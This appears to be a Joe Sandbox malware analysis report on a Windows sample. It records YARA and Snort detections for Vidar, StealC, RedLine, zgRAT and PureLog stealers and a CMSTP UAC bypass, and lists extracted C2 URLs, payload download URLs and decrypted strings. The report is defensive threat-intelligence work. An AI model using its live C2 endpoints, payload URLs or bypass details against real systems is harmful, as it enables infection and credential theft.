17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.cmd.exe.52100c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.cmd.exe.52100c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.2.cmd.exe.52100c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
14.2.run.exe.3a1a15b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.run.exe.3a1a15b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
15.2.cmd.exe.4c7f264.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.4c7f264.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.3.u5qk.0.exe.5ca0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5qk.0.exe.5ca0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
6.2.cmd.exe.4a3c976.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.4a3c976.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
15.2.cmd.exe.4c7fe64.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.4c7fe64.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901749f0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901749f0.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.run.exe.3e3686d.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.run.exe.3e3686d.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
6.2.cmd.exe.4a80264.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.4a80264.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1f5962:$s1: file:/// 0x1f5872:$s2: {11111-22222-10009-11112} 0x1f58f2:$s3: {11111-22222-50001-00000} 0x8177c:$s4: get_Module 0xe7db1:$s4: get_Module 0x1f3b25:$s4: get_Module 0xe9204:$s5: Reverse 0x1f3e0b:$s5: Reverse 0x8da95:$s6: BlockCopy 0x212279:$s6: BlockCopy 0x83c60:$s7: ReadByte 0x1f5974:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x33fd85:$s1: file:/// 0x33fc95:$s2: {11111-22222-10009-11112} 0x33fd15:$s3: {11111-22222-50001-00000} 0x1b26e8:$s4: get_Module 0x2b78fa:$s4: get_Module 0x33df48:$s4: get_Module 0x1b3b3b:$s5: Reverse 0x1f3faf:$s5: Reverse 0x33e22e:$s5: Reverse 0x2c3c13:$s6: BlockCopy 0x35c69c:$s6: BlockCopy 0x2b9dde:$s7: ReadByte 0x33fd97:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x21d805:$s1: file:/// 0x21d711:$s2: {11111-22222-10009-11112} 0x21d795:$s3: {11111-22222-50001-00000} 0x21ba10:$s4: get_Module 0x5679d:$s5: Reverse 0x21bd3d:$s5: Reverse 0x5b3e4:$s6: BlockCopy 0x218c1a:$s6: BlockCopy 0x56ce2:$s7: ReadByte 0x21d817:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x31b97b:$s1: file:/// 0x31b88b:$s2: {11111-22222-10009-11112} 0x31b90b:$s3: {11111-22222-50001-00000} 0x18e2de:$s4: get_Module 0x2934f0:$s4: get_Module 0x319b3e:$s4: get_Module 0x18f731:$s5: Reverse 0x1cfba5:$s5: Reverse 0x319e24:$s5: Reverse 0x29f809:$s6: BlockCopy 0x338292:$s6: BlockCopy 0x2959d4:$s7: ReadByte 0x31b98d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1fddd5:$s1: file:/// 0x1fdce1:$s2: {11111-22222-10009-11112} 0x1fdd65:$s3: {11111-22222-50001-00000} 0x1fbfe0:$s4: get_Module 0x36d6d:$s5: Reverse 0x1fc30d:$s5: Reverse 0x3b9b4:$s6: BlockCopy 0x1f91ea:$s6: BlockCopy 0x372b2:$s7: ReadByte 0x1fdde7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.0.u5qk.3.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x20e3df:$s1: file:/// 0x20e2eb:$s2: {11111-22222-10009-11112} 0x20e36f:$s3: {11111-22222-50001-00000} 0x20c5ea:$s4: get_Module 0x47377:$s5: Reverse 0x20c917:$s5: Reverse 0x4bfbe:$s6: BlockCopy 0x2097f4:$s6: BlockCopy 0x478bc:$s7: ReadByte 0x20e3f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x366b8f:$s1: file:/// 0x366a9f:$s2: {11111-22222-10009-11112} 0x366b1f:$s3: {11111-22222-50001-00000} 0x1d94f2:$s4: get_Module 0x2de704:$s4: get_Module 0x364d52:$s4: get_Module 0x1da945:$s5: Reverse 0x21adb9:$s5: Reverse 0x365038:$s5: Reverse 0x2eaa1d:$s6: BlockCopy 0x3834a6:$s6: BlockCopy 0x2e0be8:$s7: ReadByte 0x366ba1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 81 entries

Snort Signatures

ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 185.172.128.90

Timestamp:	04/27/24-01:31:08.487333
SID:	2856233
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/27/24-01:31:16.462312
SID:	2051831
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-01:31:14.075716
SID:	2044243
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-01:31:15.895415
SID:	2044244
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/27/24-01:31:16.178347
SID:	2051828
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-01:31:16.180488
SID:	2044246
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.59/syncUpd.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.228/ping.php?substr=two	Avira URL Cloud: Label: malware
Source: http://185.172.128.203/tiktok.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nkho	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\ssfwvk	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: u5qk.0.exe.7516.1.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\nkho	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\ssfwvk	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: VucRf0jboS.exe

ReversingLabs: Detection: 44%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nkho	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ssfwvk	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: VucRf0jboS.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: lstrcatA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: OpenEventA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CreateEventA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CloseHandle
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Sleep
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: VirtualFree
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: lstrlenA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ExitProcess
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: user32.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CreateDCA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sscanf
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: HAL9TH
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: JohnDoe
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: DISPLAY
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: http://185.172.128.76
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: /3cd2b41cbde8fc9c.php
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: /15f649199f40275b/
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: default10
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GlobalLock
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: HeapFree
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetFileSize
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GlobalSize
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Process32Next
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Process32First
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: LocalFree
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: FindClose
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ReadFile
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: WriteFile
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CreateFileA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CopyFileA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetLastError
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GlobalFree
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: OpenProcess
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ole32.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: wininet.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: shell32.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: psapi.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SelectObject
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: BitBlt
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: DeleteObject
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GdipFree
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CoInitialize
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: BCryptDecrypt
